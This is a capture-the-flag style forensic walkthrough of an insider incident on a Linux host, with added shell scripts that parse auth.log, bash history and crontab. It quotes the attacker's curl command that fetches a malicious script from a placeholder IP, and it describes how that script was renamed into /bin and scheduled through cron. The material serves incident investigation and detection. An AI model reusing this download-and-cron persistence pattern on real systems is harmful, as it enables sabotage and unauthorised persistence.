
Initial Investigation & Privileged Commands

I started by looking for privileged commands executed by the employee. To find commands run with sudo, I checked the authentication logs using cat /var/log/auth.log | grep -i "COMMAND". I then refined this to filter for commands related to package installation with cat /var/log/auth.log | grep -i "sudo" | grep "install". This revealed the installation of “dokuwiki.” From the same log entry, I identified the present working directory when “dokuwiki” was installed as /home/cyberT.

User Creation and Privilege Escalation

Next, I looked for user creation events after the package installation using cat /var/log/auth.log | grep -i "add user". This showed a user named “it-admin” was created, and the timestamp indicated this happened shortly after the dokuwiki installation.

I then checked when the sudoers file was updated to grant this new user sudo privileges. I used cat /var/log/auth.log | grep -i "vi /sudo" (implying visudo was used, which logs as vi /etc/sudoers.tmp or similar). The log entry associated with the cyberT user’s working directory was the relevant one.

Suspicious Script Activity

I then looked for files opened with the vi text editor. First, I checked for saved files using cat /home/it-admin/.viminfo | grep "save as", which revealed that a file /bin/always_update had been saved. To find opened files, I went back to the authentication logs and filtered for vi commands executed by the it-admin user. This showed that a script file named “bump.sh” had been opened.
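The auth.log checks above (sudo commands, the package install, the it-admin account creation, the sudoers edit and the editor sessions) are all variations on one parsing step: pull the sudo COMMAND records apart into timestamp, invoking user, PWD and command. The shell script below is an added example, not the room's data or the author's commands; the log lines are constructed samples in Debian/Ubuntu auth.log format (host name, PIDs and timestamps are made up), and the function names are my own.

```shell
#!/bin/sh
# Added triage helper: parses sudo COMMAND records from an auth.log and flags
# package installs, user creation, sudoers edits and editor sessions.
# Sample log below is constructed for the example (host, PIDs, times invented).
AUTH_LOG="$(mktemp)"
trap 'rm -f "$AUTH_LOG"' EXIT
cat > "$AUTH_LOG" <<'EOF'
Dec 28 06:11:10 ip-10-10-1-2 sudo:   cyberT : TTY=pts/0 ; PWD=/home/cyberT ; USER=root ; COMMAND=/usr/bin/apt install dokuwiki
Dec 28 06:11:25 ip-10-10-1-2 sudo: pam_unix(sudo:session): session opened for user root by cyberT(uid=0)
Dec 28 06:12:05 ip-10-10-1-2 sudo:   cyberT : TTY=pts/0 ; PWD=/home/cyberT ; USER=root ; COMMAND=/usr/sbin/adduser it-admin
Dec 28 06:12:05 ip-10-10-1-2 useradd[2001]: new user: name=it-admin, UID=1002, GID=1002, home=/home/it-admin, shell=/bin/bash
Dec 28 06:13:40 ip-10-10-1-2 sudo:   cyberT : TTY=pts/0 ; PWD=/home/cyberT ; USER=root ; COMMAND=/usr/bin/vi /etc/sudoers
Dec 28 06:20:01 ip-10-10-1-2 sudo: it-admin : TTY=pts/1 ; PWD=/home/it-admin ; USER=root ; COMMAND=/usr/bin/vi /home/it-admin/bump.sh
EOF

# One tab-separated record per sudo command: timestamp, invoking user, PWD, COMMAND.
# sudo pads the user name with spaces and separates its fields with " ; ".
sudo_commands() {
    awk -F' ; ' '/sudo:.*COMMAND=/ {
        split($1, head, / sudo: +/)      # head[1]=date+host, head[2]="user : TTY=..."
        split(head[1], w, " ")
        ts = w[1] " " w[2] " " w[3]
        split(head[2], u, " ")
        user = u[1]
        pwd = ""; cmd = ""
        for (i = 2; i <= NF; i++) {
            if ($i ~ /^PWD=/)     pwd = substr($i, 5)
            if ($i ~ /^COMMAND=/) cmd = substr($i, 9)
        }
        printf "%s\t%s\t%s\t%s\n", ts, user, pwd, cmd
    }' "$1"
}

# Package installs run through sudo (apt/apt-get/dpkg/yum/dnf); PWD is column 3.
package_installs() {
    sudo_commands "$1" | awk -F'\t' '$4 ~ /(apt|apt-get|dpkg|yum|dnf)( +-[^ ]+)* +install/'
}

# Account creation: both the sudo COMMAND and the useradd audit line show up.
user_additions() {
    grep -E 'useradd\[[0-9]+\]: new user|COMMAND=.*(useradd|adduser) ' "$1"
}

# Edits of the sudoers policy, whether via visudo or directly with an editor.
sudoers_edits() {
    sudo_commands "$1" | awk -F'\t' '$4 ~ /visudo|\/etc\/sudoers/'
}

# Files a given user opened under sudo with vi/vim/nano.  usage: editor_sessions LOG USER
editor_sessions() {
    sudo_commands "$1" | awk -F'\t' -v who="$2" '$2 == who && $4 ~ /\/(vi|vim|nano) /'
}

echo "== package installs ==";   package_installs "$AUTH_LOG"
echo "== user additions ==";     user_additions "$AUTH_LOG"
echo "== sudoers edits ==";      sudoers_edits "$AUTH_LOG"
echo "== it-admin editor use =="; editor_sessions "$AUTH_LOG" it-admin
```

Point the functions at the real /var/log/auth.log (and its rotated copies) to get the same four views in one pass; the PWD column is what ties the install back to /home/cyberT, and the timestamp column is what orders the install, the account creation and the sudoers edit.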

Suspecting bump.sh to be malicious but finding it deleted, I looked for how it was created by checking the bash history of the it-admin user. I navigated to /home/it-admin and ran cat .bash_history. This revealed the bump.sh script was downloaded using curl from an IP address and saved as bump (curl <IP_ADDRESS>/bump -o bump).

The script was then renamed and moved, so I checked scheduled tasks as the user likely wanted it to execute later. I used cat /etc/crontab, which showed a script /bin/OS-update was scheduled to run. This was the new name and location of the bump.sh script.

Analyzing the Malicious Script

I checked the last modification time of the /bin/OS-update script using ls -la /bin/OS-update. Then, I examined its contents with cat /bin/OS-update. The script contained commands to remove a package and echo taunting messages, including “I told you you would regret this” and “goodbye.” From the echo command output redirection within the script, I identified that a file named good_evidence would be created when this script executed. The crontab entry confirmed the /bin/OS-update script was scheduled to run daily at 8:00 AM.
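The persistence part of the investigation (the curl download in .bash_history, the rename and move into /bin, and the crontab entry that runs it daily) can be followed mechanically: trace each downloaded file through later mv commands to its final path, then parse the system crontab for entries that call such a path and render the schedule. This is an added shell example, not the room's files or the author's commands; the history and crontab contents are constructed (the IP address is a documentation-range placeholder, not the one from the challenge), and the function names are my own.

```shell
#!/bin/sh
# Added example: follow downloaded files through renames in bash history and
# match them against /etc/crontab entries.  Inputs below are constructed.
HISTORY="$(mktemp)"; CRONTAB="$(mktemp)"
trap 'rm -f "$HISTORY" "$CRONTAB"' EXIT
cat > "$HISTORY" <<'EOF'
cd /home/it-admin
curl 198.51.100.23/bump -o bump
chmod +x bump
mv bump bump.sh
vi bump.sh
mv bump.sh /bin/OS-update
crontab -e
EOF
cat > "$CRONTAB" <<'EOF'
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
0 8	* * *	root	/bin/OS-update
EOF

# For every curl -o / wget -O in a history file, follow later "mv SRC DST"
# lines and print "origin<TAB>final path".
trace_downloads() {
    awk '
    $1 == "curl" || $1 == "wget" {
        url = ""; out = ""
        for (i = 2; i <= NF; i++) {
            if (($i == "-o" || $i == "-O") && i < NF) { out = $(i + 1); i++ }
            else if ($i !~ /^-/) url = $i
        }
        if (out != "") origin[out] = url
        next
    }
    $1 == "mv" && NF >= 3 && ($2 in origin) {
        origin[$3] = origin[$2]; delete origin[$2]
    }
    END { for (p in origin) printf "%s\t%s\n", origin[p], p }
    ' "$1"
}

# System crontab (/etc/crontab format, with a user column) as
# "user<TAB>m h dom mon dow<TAB>command", skipping comments and VAR=value lines.
cron_jobs() {
    awk '/^[ \t]*(#|$)/ { next }
         $1 ~ /^[A-Za-z_]+=/ { next }
         { cmd = $7; for (i = 8; i <= NF; i++) cmd = cmd " " $i
           printf "%s\t%s %s %s %s %s\t%s\n", $6, $1, $2, $3, $4, $5, cmd }' "$1"
}

# Entries that call a program directly rather than the distro run-parts/anacron wrappers.
direct_cron_jobs() {
    cron_jobs "$1" | awk -F'\t' '$3 !~ /run-parts|anacron/'
}

# Human-readable form for the common "M H * * *" case; anything else is echoed raw.
describe_schedule() {
    echo "$1" | awk '
    NF == 5 && $1 ~ /^[0-9]+$/ && $2 ~ /^[0-9]+$/ && $3 == "*" && $4 == "*" && $5 == "*" {
        printf "daily at %02d:%02d\n", $2, $1; next }
    { print "schedule " $0 " (not a plain daily entry)" }'
}

echo "== downloads traced to final path =="; trace_downloads "$HISTORY"
echo "== crontab entries calling a program directly =="
direct_cron_jobs "$CRONTAB" | while IFS="$(printf '\t')" read -r user sched cmd; do
    printf '%s runs %s %s\n' "$user" "$cmd" "$(describe_schedule "$sched")"
done
```

Run the same functions against /home/it-admin/.bash_history and /etc/crontab on the evidence disk (and the per-user spools under /var/spool/cron if present) and the two outputs meet at the path the cron entry calls; a download that ends up in /bin and is then scheduled by root is the pattern worth alerting on, and the mtime from ls -la on that path dates the final move.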

In summary, I discovered that the disgruntled employee installed a package, created a new user (it-admin), granted it sudo privileges, downloaded a malicious script (bump.sh), renamed and moved it to /bin/OS-update, and scheduled it to run via cron to cause damage and leave taunting messages.

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.
